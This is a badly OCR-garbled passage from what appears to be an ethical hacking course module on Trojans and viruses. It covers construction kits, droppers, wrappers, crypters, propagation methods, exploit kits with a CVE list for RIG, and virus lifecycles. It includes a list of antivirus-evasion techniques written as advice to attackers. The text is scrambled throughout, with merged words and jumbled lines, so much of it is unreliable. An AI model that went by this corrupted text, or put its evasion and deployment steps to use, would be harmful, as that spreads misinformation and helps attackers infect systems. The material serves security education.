Module Page804 tical andCountermensores
Making by Comet
Copyright©
SecuritySoftware DisablerTrojans
SecuritysoftwaredisablerTrojans stopthe working programssuchas firewalls,
of security and
IDS,either bydisablingthem or killingthe processes. Theseare entryTrojans,
whichallow an
to
attacker perform
Somesecurity
of
the next level attack on the targetsystem,
softwaredisablerTrojans are as follows:
=
Certlock
+
GhostHook
*
Trojan.Disabler
DestructiveTrojans
Thesolepurpose of a destructiveTrojan
is to deletefiles o n a targetsystem.Antivirussoftware
maynot detectdestructiveTrojans. Oncea destructive Trojan infectsa computer system, it
randomly deletesfiles,folders,
and registryentries as well as localandnetworkdrives, often
resulting
in OSfailure.

DestructiveTrojans are written as simple crudebatchfileswith commands suchas "DEL,

"DELTREE," or "FORMAT." ThisdestructiveTrojan codeis usually compiled as .ini, .exe, dl, oF
com files.Thus,it is difficultto determineif a destructiveTrojan c ausesa computer system
infection.Theattackercan activate theseTrojans or they can be set to initiate at a fixed time
anddate.
Shamooni s still considereda s the most destructiveTrojan, Shamoonu sesa Disttrackpayload
that is configured to wipe systems as well as virtual desktop
interfacesnapshots.
ThisTrojan
propagates internally bylogging in usinglegitimate domainaccount credentials,
copyingitself
to the system,andcreating a scheduled taskthat executesthe copied payload.
Othercurrently
prevalent
destructive
DDoSTrojans
Trojans include Dimnie, andKilldisk
GreyEnergy,

TheseTrojans are intended to perform DDoSattackson targetmachines, networks,

or web
addresses. They makethevictim a zombiethat listensforcommands sent froma DDoSServer

all the systems performthe commandsimultaneously,

standing
on the Internet.Therewill be numerous infectedsystems
server, andwhentheserver sends thecommand a
byfor commandfromthe
to all or a groupoftheinfectedsystems,
since
amount of legitimate
a considerable
requests flood the targetand cause the service to stop responding. In other words,the
from his/her
attacker, computeralong with severalother infectedcomputers,sendsmultiple
leading
to the victim and overwhelmthe target,
requests to a DoS.Thiscan alsobeachievedby
massspamemails.
Mirai loTbotnet Trojan
is still considered
as one of the most notorious DDoS attackTrojans.
Other recently
discovered DDoSattackTrojans thathaveaffecteda large numberof systems
andnetworksandcausedmajordisruptions in businesses
includeElectrumDDoSbotnet and
BushidoBotnet. All theseDDoS Trojans havesimilarattack strategies. Theyidentifythe
unsecureddevicesin a networkand enslavethem to launcha DDoSattackon the victim's
machine.Once installedon a Windowscomputer, the Trojanconnects to a command-and

ical andCountermensores
Mackin ©by E-Comel
Copyright
control (C&C) server fromwhich it downloadsa configuration
file containing
a rangeof IP
addressesto attemptauthenticationover severalports.Alongwith the infected botnet
zombies, it performs DDoSattacksin whicha zombiefloodsa targetserver/machinewith
malicioustraffic.
Command
ShellTrojans
A command shellTrojan provides remote controlof a command shello n a victim'smachine.A
Trojanserver is installedon the victim'smachine,whichopens a port,allowing the attackerto
connect. Theclient is installedon theattacker'smachine, whichis usedto launcha command
shellon the victim's machine.Netcat,DNSMessenger, GCata re some of the latestcommand
shellTrojans,

Figure ofCommand
7.22:Working ShellTrojan

ical andCountermensores
Mackin ©by E-Comel
Copyright
 How to Infect Systems
Using
a Trojan

6
STEPbelo the Tan on thew chine Wy
eestingdapper

e
! 2m
How to Infect Systems Using a Trojan
attacker remotely
‘An can controlthe system hardwareandsoftwarebyinstalling
a Trojanon.
the system. OncetheTrojan is installed thedatabecome
o n the system, vulnerable
to threats.
In addition,
the attackerc an perform attackson third-party
systems.
AttackersdeliverTrojans i n manyways to infecttarget systems:
Trojans are includedi n bundledsharewareor downloadablesoftware.Whenusers
downloadsuchfiles,the targetsystems
automatically
installthe Trojans.
Differentpop-up
regardless ads try to trick users. They
are programmed
ofwhetheru sers clickYESor NO,a download
will begin
bythe attackersuchthat
will
andthe Trojan
‘automatically
on
installitself the system.
Attackerssendthe Trojansas emailattachments.Whenusers open thesemalicious
attachments,
the Trojans
are automatically
installed.
Usersa re sometimestemptedto clickon differenttypesof files,suchas greeting cards,
porn videos,andimages,whichmight Clicking
contain Trojans. on thesefilesinstallsthe
Trojans,
Attackersinfecta targetmachineusing a Trojan
i n the following
steps:
=
Step1: Create a new Trojanpacket using various tools such as TrojanHorse
Construction Toolkit(SET),
kit,SocialEngineering andBeast.NewTrojans havea higher
chanceof succeeding the target
i n compromising system, as the securitymechanisms
mightfail to detectthem.TheseTrojans can be transferred to thevictim'smachine

using
dropper
a or downloader.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Step2: Employ or a downloaderto installthe maliciouscodeon the target
a dropper
system. appears to users as a legitimate
Thedropper application
or a well-knownand
trustedfile.However, whenit is run, it extracts the malwarecomponents hiddeni n it
and executes them,usually without saving them to the disk, to avoid detection
Droppers
decoy
include images,games,or benign
to divert users’
transporters
messages i n theirpackages,
attention from maliciousactivities. Downloaders
thatdo not contain theactualmalware file;however,
which
serve
as
a
a re malware
theycontain thelink
fromwherethe actualTrojan can be downloaded. Whena downloaderis executedon
the targetmachine, it connectsback to the attacker's server and downloads the
intendedTrojan machine.Droppers
on the victim’s can easily evadefirewalls; however,
a downloader

Step3: Employ
c an bedetectedwith the help

a wrappersuchas petite.exe,
of network
analyzer
tools.
Graffiti.exe,
IExpress Wizard,or EliteWrap
to help bindthe Trojan executableto legitimate filesto installit on the target system.
Step 4: Employ a crypter suchas BitCrypter to encrypt the Trojan to evadedetectionby
firewalls/IDS,
Step5: Propagate the Trojan byimplementing various methodssuchas sending it via
overt andcovert channels, exploit kits,emails, and instant messengers, thereby tricking
users into downloading and executing i t. An active Trojan c an perform malicious
activities suchas irritatingusers with constant pop-ups, changing desktops,changing or
deleting files,
stealingdata,andcreating backdoors.
Step6: Deploy the Trojan on the victim’s machinebyexecuting the dropper or
downloadersoftware to disguise it. Thedeployed filecontains wrapped and encrypted
malware.
Step7: Executethe damage routine. Most malwarecontain a damageroutine that
deliverspayloads.Some payloadsjustdisplay whereasotherscan
imagesor messages,
even deletefiles,
reformatharddrives, or cause other damage.
Thedamageroutine can
alsoincludemalwarebeaconing.

Figure7.23
Diagram thecomplete
showing proces involved targetm achine
i n infecting usingTrojan

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Creating
a Trojan

|@
Trojan
Horse
Kits
hepto
construction attackers
horsesoftheir choice
constructTrojan
Darkiforse TrojanVirusMaker

in |
|©Thetoos these
Deck
k tscanbedangerous
not properlynmcuted
andcan
byselectingfrom
creates
various
options
Oavlorse Troanvirus maker user-specified
Trojans

‘Trojan
HorseConstructionKits

Io
Creating
a Trojan
Attackers
can create Trojans horseconstruction kitssuchas DarkHorse
usingvarious Trojan
Trojan
Virus Maker,
andSennaSpy Trojan Generator.
Trojan
Horse ConstructionK it
Trojan
horse construction kits helpattackersconstruct Trojan
horsesand customize them
according
to their needs.Thesetools are dangerous
andcan backfireif not properly
executed
New Trojans createdby attackersr emain undetectedwhen scannedby virus- or Trojan-
scanningtools,as they
do not matchanyknownsignatures.Thisaddedbenefitallowsattackers
to succeed
=
in
launching
attacks.
Trojan
DarkHorse VirusMaker
DarkHorse Virus Makeris usedto create user-specified
Trojan via selection
Trojans from
ofavailable
a variety TheTrojans
options. are created to theseselected
to act according
options.Forexample, if you choosethe optionDisableProcess,
the Trojan
disablesall
processeson thetargetsystem. Thefigurebelowshowsa snapshot
ofDarkHorseTrojan
VirusMakerwith its various availableoptions.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 DarkHorseTrojan
Virus
Maker 1.2

SomeadditionalTrojan
7.2: Screenshot
Figure of Dartorse
horse construction kitsare as follows
Vius
Trojan Maker

©
Trojan
HorseConstruction
Kit
Senna SpyTrojan
Generator
+

=
Batch
Trojan
G enerator
UmbraLoader Botnet Trojan
-
Maker

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Employing or Downloader
a Dropper

Droppers Downloaders

ie the
Dropperused
t o camouflagemalware

the targeted
{©Downloaders
a programthatcan download

does
not
cary
malware
itself
systems
(©Downloader

Dropper
consists ae
dropper
Undetectable
Installation
does,
there
posi
afone ar more

byantvis software;
typesof
alsthe
processcan bedonestealthy
s

theantimalware
scanner
the for

‘ostDownloader
andTojan.Downoader
oftheames
Some
droppers
fordeploying
temple
hat attackers
matware to thetarget
stackeremployfr deploying
the targetmachine
malwareto

Employing or Downloader
a Dropper
their intendedTrojans,
After constructing attackerscan employ
a dropper
or a downloaderto
transmit theTrojan
package to the victim’s
machine.
Droppers
are system.malware
Droppers programsthat are used to camouflage
functioning of the target The dropper
payloadsthat can impede
consists of one or more
malwarefeaturesthat can make it undetectableby antivirus software;
the
types of
moreover, the
installationprocess can be stealthily
performed.
Thedropper is executedbysimply loadingits own code into the memory,andthe malware
payload is then extractedand written into the file system. Next,the malwareinstallation
process andthepayload
i s initiated, is executed,
Emotetand Dridexa re well-known droppers that attackersemployfor deploying malwareon
the targetmachine.
Downloaders
downloaderis
‘A a programthat can downloadand installharmfulprogramssuchas
malware.Downloadersare similar to droppers to a certain extent. However, the main
difference
is thata downloader
is possible
doesnot carrymalware whereas
for a new unknowndownloaderto passthrough itself does;
a dropper
the anti-malwarescanner.
hence,it

Attackersuse downloaders
as partof the payloadotherharmfulprogramsthat can dropand
or
stealthily
installthe malware.Downloaders as camouflaged
are spread filesattachedin emails,
and the attachedprograms pose as legitimate
programs suchas accounts.exe or invoices.

ical andCountermensores
Mackin ©by E-Comel
Copyright
server for directlydownloader
Whenthe victim opensthe attached
fetching
infected
file,the
othermaliciousprograms.
tries to contact the remote

Godzilla
--W97M.Downloaderlgen36,
_—Trojan.Downloader,
downloader,
|SB,.Downloaderlgen277
and
are some well-known downloadersthat attackersemployfor

deploying
malware
machine,
on the target

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Employing
a Wrapper

‘wrapper
Tolan
eecutable
genuine
binds wth ookngXEapa

he
and
hen
acgroundthe
user uns the wrapped, is installs Tan inthe
thenuns he wrepengaptestion
senda birthday
Atacher might t at
greeting
nthe oregon
wl installa
Trojana thevee

Texpress
ares
Wizard i nd rape
"

Seton
Wrappers

Acvanced
Fle loner

Soprano
canautomatically
v

‘a
‘that =
3
inate embeded

Employing
a Wrapper

Wrappers bindthe Trojan applications

executablewith.EX€ that appear genuine, suchas games
or officeapplications.
Whenthe user runs the wrapped.EXE application,
it first installsthe
Trojan i n the background and then runs the wrappingapplication i n the foreground. The
attackercan compress any (00S/WIN) binary with tools suchas petite.exe. This tool
decompresses an EXEfile (once compressed) at run time. Thus, it is possible for the Trojan to
geti n virtuallyundetected, as most antivirus softwarecannot detectthe signatures i n thefile.

Theattackercan alsoplace severalexecutables insideone executable. Thesewrappersmayalso

supportfunctionssuchas running one file i n the background andanotherone on the desktop.
Technically speaking, wrappersare a type of “glueware― used to bind other software
components together. A wrapperencapsulates severalcomponents into a single datasource to
makeit usablein a more convenient manner compared to the original unwrapped source.

Thelure of free software trickcan users into installing Trojan horses.For instance, a Trojan
horsemight arrive in an emaildescribed as a computer calculator.Whenthe user receives the
emai,the description of the calculatormay lead him/her to installit. Although it may, i n fact,
bea defaultapplication, once the user installs theapplication file,the Trojan is installed i n the
background and it will perform other actions that are not readily apparent to the user, suchas
deleting
filesor emailing
sensitive information
to theattacker.
In another
instance,an attacker
sendsa birthday
greetingthat will install a Trojan
as the user watches,
eg., a birthday
cake
dancing
acrossthe screen.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Fees
CovertWrapper
Programs
=
lExpress Wizard
lxpressWizardis a wrapperprogramthat guides the user to create a self-extracting
package that can automaticallyinstallthe embeddedsetup files,Trojans,etc. lExpress
can remove the setupfilesafterexecution andthuserase traces ofTrojans. Then,it can
run a program or onlyextract hiddenfiles.SuchembeddedTrojans cannot bedetected
byantivirus software,

Welcometo [Express
2.0

Fite 7.26:Screenshot
of xpress Ward
Someadditionalwrapper toolsare as follows:
+

+
elite
Wrap
File
Advanced Joiner
+

3
Soprano
Exe2vbs
Kriptomatik

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Employing
a Crypter

is used
not
byto
hide or of
easily file,
©Cryptersoftware byhackers
getdetected ativiuses
keyloggers
viruses, toolsin anykind so thatthey

BitCrypter
"

Crypters
tw encrypt
and
v1.5
Aegicrypter
eee
withoutaffecting
‘pps
sight
Hidden crypter
theirdec functionality Bateship
Cypter

Employing
a Crypter
A crypteris a softwarethat encryptsthe original
binary
codeof the .exe file, Attackersuse
crypters to hideviruses, spyware,keyloggers, etc.,to makethem undetectable
RATS, by
antivirus software.
Somecrypters
that one can use to preventmaliciousprogramsfrom being
detectedbysecurity
are
as
mechanisms follows,
=
BitCrypter
Source:https://www.crypter.com
BitCrypter can be used to encrypt and compress32-bit executablesand .NETapps
without affectingtheir directfunctionality.
A Trojanor malicioussoftware piececan be
encrypted into legitimate softwareto bypass
firewallsandantivirus software.BitCrypter
supportsa widerangeof0S,fromWindowsXPto thelatestWindows10.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Oabeca
Daa. a

[ems
agl [om |
Newleon

Someadditionalcrypter
Figure7.27:
toolsare as follows:
of
Srenshot @tcraer

=
SwayzCryptor
+

=
Hidden
v1.5
AegisCrypter
Sight
Crypter
=
Battleship
Crypter
Heavens
Crypter
Cypherx

Module
7Page
896
tical
Making
and by CountermensoresCopyright©
Comet
Propagating
and Deploying
a Trojan

Deploy
a Trojan
through
E mai Trojan
"Major AttackPaths

Propagating
and Deploying
a Trojan
(Cont'd)
Deploy
a Trojan
through
Covert Channels.

Atackers
use covertchanel to deploy
andhidemalicious nanundetectable
Trojans protocol
vert channels operate
thatare deployed
ons
nthe target
network methodby to
tunneling andare employedattackersevade
mosty

.
f irewalls

NorthKoreantunneling
too!

oe
Sa
B|
 Propagating
and Deploying
a Trojan
(Cont'd)
Deploy
a Trojan
through
ProxyServers

_tachers
compromise
over and
Theattackers
str systems
severalcomputers

havefll control
using aTrojan
proxy

theproxyvit’systems
andcan launch
sing thema s hiddenpronyservers

attacks
on other fom

‘tacks
the
us thisto anonymously anddeploy Trojan onto
propagate
ifthe authoritiesdetectlegalactivity,
the targetcomputer

the footprintleadto innocentusers

Internet
are servers
Thousands
ofmachines
onthe infected
withpony

>
al]?

Propagating
and Deploying
a Trojan
(Cont'd)
Deploy
a Trojan
through
USB/FlashDrives

|©Atackers
droptheUSB
divesonthepathway
|= Oncethe Use dives pike upand inserted and
wal forrandom
vitims to pickthemup

propagated
infecting
inthe tagesystem
bythelnocent victim the Trojans
thesystem
‘onto execute,thus
angie automatialy andcompromising
the sytem andnetwork

7
Module 898
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
 Propagating
and Deploying
a Trojan
(Cont'd)
‘Techniques
for
Evading
Antivirus
Software

the contenoftheTrojan
‘Change sing hexeditora ndalso the
change
checksum thefile
andencrypt

Neveruse downloaded
Trojans r om the
web
fantviuscan detet theseeasy

a Trojan
and Deploying
Propagating
a Trojan
After creating a dropper/downloader,
and employing wrapper, and crypter,
the
attacker the package
must transfer anddeployit on thetarget machine.Theattacker
can use
the following
techniques the Trojan
to propagate package to the targetmachine:
+
Deploy
Deploy
a
aTrojan
through
Trojan
emails

through
covert
channels
*
Deploy through
a Trojan proxyservers
+
DeployTrojan
a USB/flash
through Drives
Deploy a Trojan through Emails
Trojanis the
‘A means bywhichan attackercan gain access to the victim'ssystem. To gain
control
over
the victim's machine,
that luresthe victim into clicking
the malicious
theattacker
on a link provided
link sent bythe attacker,
a
creates Trojan server andthensendsan email
withintheemail.Assoon as the victim clicks
to the Trojan
it connects directly server. The Trojan
server thensends a Trojanto the victim system, whichundergoes automatic installationon the
victim'smachine andinfectsit. Asa result, thevictim'sdevice
establishes a connection withthe
attackserver unknowingly. Oncethe victim connectsto the attacker'sserver, the attackercan
takecomplete
of
controlthe victim’s andperform
system
onlinetransaction or purchase,
anyaction. Ifthevictim carries out an
thenthe attackercan easily stealsensitive informationsuchas
the victim'screditcarddetailsand account information.In addition,
the attackercan use the
Victim'smachineto launchattacks
TheTrojan
on
other
systems,
whenusers open an emailattachmentthat installsthe Trojan
may infectcomputers
on theircomputers,whichmight
for
serve as a backdoor criminalsto accessthesystem later.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 MajorTrojan
Atack Pats:

DeployTrojan
a through
Covert Channels
anddeploying
7.28:Propagating
Figure Trojan
through
emall
refersto something
“Overt― obvious,
explicit, whereas
or evident, refersto something
“covert―
concealed,
secret, or hidden.

overt channel is a legal

‘An channelfor the transferof data or informationi n a company
network, to transfer
and it workssecurely data and information. On the contrary, a covert
channelisan illegal,
hiddenpathusedto transferdatafroma network.
‘The
tablebelowliststhe primarydifferences
between overt andcovert channels:

OvertChannel Covert Channel

A legitimate
communicationpath
within a computer
for the transferof data
or network
system
|‘A
that
transfers
channel
computer system
policy
security
informationwithin a
or network i n a waythat violatesthe

Its idlecomponents
to create a covert channel |
can be exploited An example
between
of a covert channel
a Trojan
isthecommunication
andits command-and-control center
between
Table7.2:Comparison the aver channela ndcovert channel

Covertchannels are methods used byattackers to deploy and hidemalicious Trojans i n an

undetectableprotocol. They relyon a technique calledtunneling,whichenablesone protocol
to transmit over the other.Thismakesit an attractive modeof transmission for a Trojan,
becausean attackercan use the covert channelto installa backdooro n the targetmachine
Covert channelsare mostly employed byattackers to evadeantivirus scanners and firewalls
deployed in the targetnetwork.Attackerscan create covert channels usingvarious toolssuch
as GhostTunnelV2,and ELECTRICFISH (aNorth Korean tunneling tool).Thesetools enable
attackersto create covert tunnelswith protocols suchas DNS, SSH, ICMP,and HTTP/S, to
deploy Trojansandperform dataexfiltration,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Na
AN
anddeploying
7.29:Propagating
Figure covert channels
Trojanthrough
Deploy
a Trojan
through
Proxy
Servers
A Trojan proxy is usually a standalone application that allowsremote attackersto use the
victim'scomputer as a proxy to connect to the targetmachine. Attackerscompromise several
computers andstart usingthem as hiddenproxyservers. Attackers havefull controlover the
proxy victim’ssystemandcan launchattackson other systems i n the affecteduser'snetwork.
Attackers use thisstrategy to anonymously propagate and deploy the Trojan o n the target
computer. If the authoritiesdetectillegal the footprints
activity, leadto innocent users and not
to the attackers, potentially resultingi n legal hasslesfor the victims,who are ostensibly
responsible for their networkor any attackslaunchedfromthem.Thousands of machines on
the Internet are infectedwith proxy servers. Attackers can alsoemploy proxy server Trojans
suchas Linux.Proxy.10, Proxy Trojan,or Pinkslipbot (Qbot),whichcan automatically create
proxiesandbeusedto perform malicious activities.

, ea. “>

>tally?
ag Sa
gure 730:Propagating
anddeploying
Tojonthrou
Deploy a Trojan
throughUSB/Flash Drives
An attacker
can
also transferthe Trojan
the USBdrive on the targetsystem.
package
onto a USBdriveand
Sometimes, attackersjust drop trick the victim into using
a USBdriveandwait fora
randomvictim to pickit up. Oncethe
bythe innocent victim,the Trojan
method, depending
USB drive is picked
is propagated
on the typeof packaging
up andinsertedinto
on the system
technique
the
target system
bythe dropor download
usedbythe attacker.After propagating
machine,
to the victim’s the Trojan is automatically executedon the targetsystem, thereby
infectingandcompromising the system andnetwork.

=|
a
le

ical andCountermensores
Mackin ©by E-Comel
Copyright
Techniques
forEvading
AntivirusSoftware
Sometimes, various typesof antivirus scannersare deployedi n the targetnetwork, andthese
antivirus scanners do not allow the propagation or deployment of random or malicious
packages.
an and
Hence,propagatingdeploying
attacker.Thevarious techniques
Trojans,
a Trojan stealthily
is one of the important
that can be usedbyattackersto makemalwaresuchas
byantivirus applications
viruses, andworms undetectable are listedbelow.
tasksof.

1. Breakthe Trojan
file into multiple
pieces andzip themas a single
file.
2. Always andembedit into an application
write your Trojan (anantivirus programfailsto
n ew Trojans,
recognize doesnot contain the propersignatures).
as its database

Changethe Trojan’s
syntax:
Converta n EXEto VBscript
©
Change
the .EXEextension to .DOC,
.EXE,
.PPT,
.EXE,
or (Windows
.PDF.EXE hides

“known
extensions―
Change
of
the a up
the content
bydefault;
Trojan
it shows onlyas .DOC,
hence,
usinghexeditor.
.PPT,
.PDF,
etc.)
Changeandthe
file.
the checksum encrypt
(antivirus
downloadedfromthe web
Never use Trojans softwaredetectstheseeasily).
Usebinderandsplitter
toolsthatcan changethe firstfewbytes oftheTrojan programs.
Performcodeobfuscationor morphing.
Morphing is done to preventthe antivirus
programfromdifferentiating
betweenmaliciousandharmlessprograms.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Exploit
Kits CEH
hit
or
‘explo
cimeware
sa
latfrm
deliver
expos
payoads
a5
Trojans,
oot to and Sch soywaes,baddoos,

‘=
aoa 2s EE
Exploit
Kits (Cont'd)

Sage,
Spore,
Revenge,
Matra,
Phiadephia,
Princess
Ransomwa
“©
EX was used
FUG byatacersfordstrbuting
Cryptobt,Cryptoluck,
ryposhils,
RIG _Crymodetense, Cl, nd
NPIOIEISY |

ExploitKits
IG
in
Ek was also
u sed strbutng LatentBot, a ndRar Trojans
Pony

ExploitKits
An exploitkit or crimeware toolkit is usedto exploitsecurity loopholesfoundin software
applicationssuchas AdobeReaderandAdobeFlashPlayer, bydistributing malwaresuchas
spyware,viruses, Trojans,worms, bots, backdoors,bufferoverflowscripts,
or otherpayloadsto
the targetsystem. Exploit exploit
kits come with pre-written code.Thus, theyare easyto use
foran attackerwho is not an IT or securityexpert.Theyalsoprovidea user-friendly
interface
to
track the infectionstatistics as well as a remote mechanism to control the compromised

ical andCountermensores
Mackin ©by E-Comel
Copyright
 exploitskits,a n attacker
Using
system. programsthatare accessible
can targetbrowsers, using
browsers,
zero-day
vulnerabilities,
andexploits
updated
with new patches
instantly.
Exploit
kits
are usedagainst
usersrunninginsecure or outdated
software applications
on theirsystems,

goo ==

‘tamasacr
@

aboveshowsthegeneral
Thediagram procedure kit;the processof exploiting
foran exploit a
machinemight
vary depending
on the exploit
kit used
‘=
Thevictim visits a legitimate
websitethat on the compromised
is hosted web server.
‘=
through intermediary
Thevictim is redirected various servers.
‘=
Thevictim unknowingly landson an exploitkit server hosting
the exploit
packlanding
page.
Theexploit kit gathers informationo n the victim, basedon whichit determines
the
exploit
anddeliversit to thevictim'ssystem.
If the exploit
succeeds,
a malwareprogramis downloaded
andexecutedon the victim’s
system.
Exploit
Kits
=
RIGExploit
Kit
TheRIG exploit
kit is one of the most popular
exploit
kitsi nrecent years,with its wide
rangeof malwaredistribution,
RIGEKwas firstdiscovered
in 2014,It is efficientin
distributing
many exploits.
RIGEK was used successfully
byattackersi n distributing
Cryptobit,
CryptoLuck, CryptoShield,CryptoDefense, Sage, Spora, Revenge,PyCL, Matrix,
Philadelphia,
and Princess ransomware. It was alsoinvolvedi n distributingLatentBot,
Pony,andRamnitTrojans. Furthermore, RIGwas involvedin delivering the famous
bankingTrojan Zeus.The latest version of the RIG exploitkit takes advantage of
outdatedversions of applications suchas Flash, Java,Silverlight,
Internet Explorer,
or
MicrosoftEdge to distributethe Cerberr ansomware,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Feature
Landing
pagebased
o n a standard302redirect

Domainto and
auto-rotator
undetectable)
FUD(entirely
avoidblacklistingdetection
exploits
Combinationof differentweb technologies,
suchas DoSWF,
JavaScript,
Flash,and
to obfuscate
‘VBScript, theattack
TheRIGexploitkit is supported as wellas thefollowing
fordifferentbrowsers CVEs:
FlashPlayer
CvE-2018-4878 ‘Adobe Vulnerability
Use-After-Free
VE-2018-8174 Windows
VBScript RemoteCode
Engine
CVE-2013-2551 MicrosoftInternet Explorer
Use-After-Free
Execution
Vulnerability Vulnerability
RemoteCodeExecution
MicrosoftInternetExplorer
CVE-2014-0322 RemoteCodeExecutionVulnerability
Use-After-Free
FlashPlayer
VE-2014-0497 ‘Adobe Vulnerability
RemoteCodeExecution
CvE-2013-0074 MicrosoftSilverlight
DoubleDeferenceRemoteCodeExecutionVulnerability
CVE-2013-2465 Oracle
JavaSEMemory Vulnerability
Corruption
CVE-2012-0507 OracleJavaSERemoteJavaRuntimeEnvironmentCodeExecutionVulnerability
CVE-2014-6332
Windows Vulnerability,
RemoteCodeExecution
OLEAutomationArray
CVE-2015-2419 JScript9
Memory Vulnerability
Corruption
CvE-2016-0189 Scripting
Engine
Memory
Corruption
Vulnerability
Overflow
CVE-2015-8651 Integer FlashPlayer
i n Adobe
Vulnerability
Statistics

Figure7.3%:
Screenshot
ofRIGExpl Kit

ical andCountermensores
Mackin ©by E-Comel
Copyright
Someadditional
exploitkitsthatattackers
c an use to and deploy
propagate Trojans
are as
follows:
=
Magnitude
+
Angler
+
Neutrino
Terror
Sundown

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

‘Malware
ConceptsFiloloss MalwareConcepts

MalwareAnalysis

‘Trojan
Concepts Countermeasures

Virus and
Worm
Concepts Anti-MalwareSoftware

Virus and Worm Concepts

Thissection introduces you to various conceptsrelatedto viruses andworms. In addition,
it
discusses of a virus andthe working
the life stages of a virus. It alsoexplores
whypeople
create
computerviruses, indicationsof a virus attack,virus hoaxes,fake antivirus tools,and
ransomware,

Furthermore, it highlights
differenttypesof viruses, categorizedbytheir origin,techniques
used
to infecttargetsystems,
the typesof filestheyinfect,wheretheyhide,the sort of damage they
cause,the typeof OSthey
work
on, andso on. It alsodealswith computer
betweenworms andviruses, andexplores
difference worm makers.
worms, discusses
the

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Introductionto Viruses
(@Asis
program
tat
produces
bya
aselereptiting ts on coy comote boot eto

evs
re traneted
general
fected houghledownloads, d/h dives,ana mal attachments

Creating
Viruses Purpore
of

Introduction to Viruses
Virusesare the scourge of moderncomputing.Computer viruses havethe potential
to wreak
havoco n bothbusiness andpersonal Thelifetimeofa virus depends
computers. on its ability
to
reproduce itself, Therefore,
attackersdesign
every virus codesuchthat the virus replicates

n
itself times.
A computer virus is a self-replicating
programthat produces its code byattaching copiesof
itselfto otherexecutablecodeandoperates withoutthe knowledge or consent of the user. Like
a biological virus, a computer and can contaminate other files;however,
virus is contagious
viruses can infectexternalmachines onlywiththe assistanceof computer users,

as soon as their codeis executed;

Someviruses affectcomputers other viruses remain dormant
until a pre-determined circumstance is met. Virusesinfecta varietyof files,suchas
logical
overlay
files (.OVL)
and executablefiles (.EXE,
SYS,
COM,or .BAT).
Theyare transmitted
through
filedownloads,
infected drives,andemailattachments.
disk/flash
Characteristics
of Viruses
Theperformance
loss,
system a
of computer is affectedbya virus infection.Thisinfectioncan leadto data
andfilecorruption,
crash,
Someofthecharacteristics
ofa virus are asfollows:
+

+
other
Infects
Transforms
programs
itself
+

Encrypts
Alters
itself
data

ical andCountermensores
Mackin ©by E-Comel
Copyright
 =

Corrupts
Replicates
=
itself
files andprograms

Purpose
of
CreatingViruses
Attackerscreate
viruses with disreputablemotives. Criminalscreate viruses to destroya
data,a s an act of vandalism,
company’s or to destroya company’s
products; however,
in some
cases,viruses aidthe system,
createsa virus forthefollowing
An attacker purposes
+
on competitors
inflictdamage
+

+
Realize financialbenefits
Vandalizeintellectualproperty
Play
pranks
Conduct
research
Engage in cyber-terrorism
Distributepolitical
messages
+

+
Damage
Gain
orthe
network computers
remote
access
victim's
computer
to
Indications
of VirusAttack
Indicationsof virus attacksarise fromabnormalactivities. Suchactivities reflectthenature of a
virusbyinterrupting
system
the
regular
the ormerelynot
contributetowardattackingsystem;
runs slowerthan usual,
flow of a process a program.However, all bugs
theymaybe falsepositives. Forexample,
one mayassume that a virus hasinfectedthe system;
created
ifthe
however,
theactualreason might be programoverload.
effectivevirus tendsto multiply
‘An rapidly and mayinfect some machinesi n a short period.
Viruses can infectfiles on the system, andwhen suchfiles are transferred, theycan infect
machines of other userswho receive them.A virus can alsouse file servers to infectfiles.
Whena virus infectsa computer,the victim or user will beableto identify
some indications
of
thepresenceofvirus infection.

=
computer
Someindicationsof
Processes
virus
infection
are
follows: as

requiremore resourcesandtime, resulting

in degraded
performance
=

=
beeps
with
Computer
no
changes
Drive label
display and OSdoesnot load

antivirus
Constant
alerts
freezes
Computer frequently
or encounters an error suchas BSOD

Files missing
andfoldersare

ical andCountermensores
Mackin ©by E-Comel
Copyright
 harddriveactivity
Suspicious
Browserwindow“freezes―
Lackof storagespace
Unwantedadvertisements
andpop-upwindows

ical andCountermensores
Mackin ©by E-Comel
Copyright
 of Virus Lifecycle
Stages
osign
virus
| Developing
cade or
sng languagesconstuction
programming

Replication fora period

withinthetargetsystem
a ndhenspreads
self

Detection
|Aviusleldentiedas
threat infecting
targetsystems

Incorporation
| sofware
developers
assimilate
Antvrus
defenses
against
vias the

damage
routine
Usersinstall updates
antivirus and liinatethe ius threat

ofVirus Lifecycle
Stages
Thevirus lifecycle
includesthe following fromorigin to elimination.
six stages

1. Design:
2.
Development
Replication:
of for
virus codeusingprogramming

a
languagesor construction kits.

within thetargetsystemandthenspreads
Thevirus replicates period
itself
Launch:Thevirus is activatedwhenthe user performs specific
actions suchas running
an infected
program.
Detection:Thevirus is identifiedas a threat infecting
targetsystem,
Incorporation:Antivirussoftwaredevelopers assimilate defenses the virus.
against
Executionof the damage routine: Usersinstallantivirus updates
andeliminatethe virus
threats

ical andCountermensores
Mackin ©by E-Comel
Copyright
 of Viruses
Working
Infection Phase ‘Attack
Phase
(©
nthe
infection
phase,elf
nd are
programmed
with
events
thevirus replicates (8 ruses tigger to

spect suchas ser ask, ay ine or specie

F |
orca pores reget pee? raed
t

=| = i =
ofViruses
Working
Virusescan attacka targethost's systemusing a varietyof methods.Theycan attach
themselvesto programsand transmit themselves to other programs through specific events.
Virusesneedsuchevents to takeplace, as theycannot self-start, infecthardware, or transmit,
themselves usingnon-executable files.“Trigger―
and“direct
attack―
events can cause a virus to
activate and infectthe targetsystem whenthe user triggers attachmentsreceived through
email, websites,maliciousadvertisements, flashcards,pop-ups,and so on. Thevirus can then
attackthe system'sbuilt-inprograms,antivirus software,datafiles,system startupsettings, etc.
Viruseshavetwo phases: theinfection phase andthe attackphase.
+
InfectionPhase
Programs
modifiedbya virus infectioncan enablevirus functionalitiesto run on the
Thevirus infectsthe target
system. systemafter
